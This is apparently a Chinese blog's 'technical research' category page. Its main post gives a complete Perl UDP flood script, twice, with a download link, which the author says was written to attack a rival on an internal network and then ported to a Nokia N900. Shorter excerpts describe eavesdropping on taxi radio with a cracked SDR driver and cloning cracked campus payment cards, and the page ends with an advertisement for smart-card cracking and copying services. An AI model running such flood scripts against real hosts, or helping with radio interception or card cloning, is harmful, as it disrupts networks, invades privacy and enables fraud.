Posts under category 技术研究

N900 进行 UDP Flood 攻击

[本文部分内容涉及攻击性,仅供研究交流,请勿恶意利用。]

之前跟某某对着干,写了个小程序在内网用来 UDP Flood 攻击,后来想了想,可不可以用我的 N900 进行呢,后来找了一些参考资料,决定从 Perl 下手。

#!/usr/bin/perl

############################

udp flood script for perl

############################

use Socket;
use strict;

if ($#ARGV != 3) {
print "flood.pl ip port size time\n\n";
print " port=0: use random ports\n";
print " size=0: use random size between 64 and 1024\n";
print " time=0: continuous flood\n";
exit(1);
}

my ($ip,$port,$size,$time) = @ARGV;

my ($iaddr,$endtime,$psize,$pport);

$iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
$endtime = time() + ($time ? $time : 1000000);

socket(flood, PF_INET, SOCK_DGRAM, 17);

print "Flooding $ip " . ($port ? $port : "random") . " port with " .
($size ? "$size-byte" : "random size") . " packets" .
($time ? " for $time seconds" : "") . "\n";
print "Break with Ctrl-C\n" unless $time;

#my $sum = 1;

for (;time() <= $endtime;) {
$psize = $size ? $size : int(rand(1024-64)+64) ;
$pport = $port ? $port : int(rand(65535))+1;
send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));
#$sum+=1;
#print "sending package".$sum;
#system "clear";
}


 

利用 Perl 的 Socket 模块大规模发送 UDP 数据包,进行 UDP 洪水攻击。不过 Dos 攻击本来就是个两败俱伤的技术手段,N900 的低配 CPU 只能勉强卡顿下网络。

UDP Flood on Nokia N900

I made a DDOS test recently, after it I had a fancy idea --- Using Nokia N900 to made UDP Flood.

As we know, The Nokia N900's system is Maemo 5, and the Maemo 5 was base on the Debian. So Nokia N900 is a pocket PC that we can do anything on it. We can use the Perl, and let the socket module to send UDP pockets.

source code :
#!/usr/bin/perl

############################
# udp flood script for perl
############################

use Socket;
use strict;

if ($#ARGV != 3) {
  print "flood.pl ip port size time\n\n";
  print " port=0: use random ports\n";
  print " size=0: use random size between 64 and 1024\n";
  print " time=0: continuous flood\n";
  exit(1);
}

my ($ip,$port,$size,$time) = @ARGV;

my ($iaddr,$endtime,$psize,$pport);

$iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
$endtime = time() + ($time ? $time : 1000000);

socket(flood, PF_INET, SOCK_DGRAM, 17);

print "Flooding $ip " . ($port ? $port : "random") . " port with " . 
  ($size ? "$size-byte" : "random size") . " packets" . 
  ($time ? " for $time seconds" : "") . "\n";
print "Break with Ctrl-C\n" unless $time;

#my $sum = 1;

for (;time() <= $endtime;) {
  $psize = $size ? $size : int(rand(1024-64)+64) ;
  $pport = $port ? $port : int(rand(65535))+1;
  send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));
  #$sum+=1;
  #print "sending package".$sum;
  #system "clear";
}

But DOS attack need powerful CPU and other energy. The Nokia N900 just has 600MHz CPU, Although we can overclock the CPU, but the effect is not obvious.

Okay, Just for funny and study :-)

Download the flood code : flood.pl

解决 Android 4.0.4 连接 L2TP 类 VPN 超时问题

很早之前自己使用 Android 4.0.4 就发现这个问题了,连接 L2TP 的 VPN 会出现无法连接,超时的提醒。通过查看 Android 的源码可知,问题出在了 racoon 模块里,只需简单重新编译一个就可以了。这里就给出一个重新编译好的。将模块用 Root Explorer 管理器复制到 /system/bin,并将权限设置如图即可,然后重启手机,就可以连接 L2TP 的 VPN 了。(抱歉手头上没有 4.0.4 的机子,没办法提供太多截图)

下载地址:http://file.bobylive.com/other/racoon

Nokia N900

一直都对 Linux 的掌上终端挺感冒的,于是让人从外面带回来了一台库存的 Nokia N900。选择 N900 是有原因的,首先 N900 相对来说比较小巧(作为 MID,对比起手机还是很厚重),并且 N900 相对上几代的产品配置更高,而且加入了电话功能,不再像N800 那样需要依赖 WIFI。并且N900采用的是 Maemo 5 系统(基于 Debian),许多软件都被支持,要是自己会 Python,呵呵。

- Read More -

SDR 研究 — 窃听出租车电台

[本文部分内容涉及攻击性,仅供研究交流,请勿恶意利用。]

终于是放假了啊,之前扔下的 R820T 一直没时间好好弄一弄。兴致勃勃给电脑装好 Zadig(XP 版下载非 XP 版下载)的驱动(需要这个破解过的驱动才可以调到那些不该听的频率),弄个 SDRSharp 就开始窃听,高科技大片的场景马上就可以重现了。

- Read More -

制作校园一卡通,充分利用资源

本文只作技术研究之用,请勿用于非法用途,否则后果自负。

目前学校的两张消费卡(水卡,饭卡)都已经成功破解了,除了极少数数据作用仍未了解之外,使用是暂时没什么大问题的。但老是要拿着两张卡实在是太不方便了,于是做了一张一卡通,原理也是很简单,饭卡使用的是 2 扇区,水卡使用的是 4,5 扇区,不会发生冲突,把数据整合到一张卡,扇区的 Key 保证与原卡一致就可以。

妈妈再也不用担心我丢卡了

提供各类智能卡(IC 卡、ID 卡)解密,破解,复制等相关业务以及技术咨询

厂家淘宝网店地址:http://bobylive.taobao.com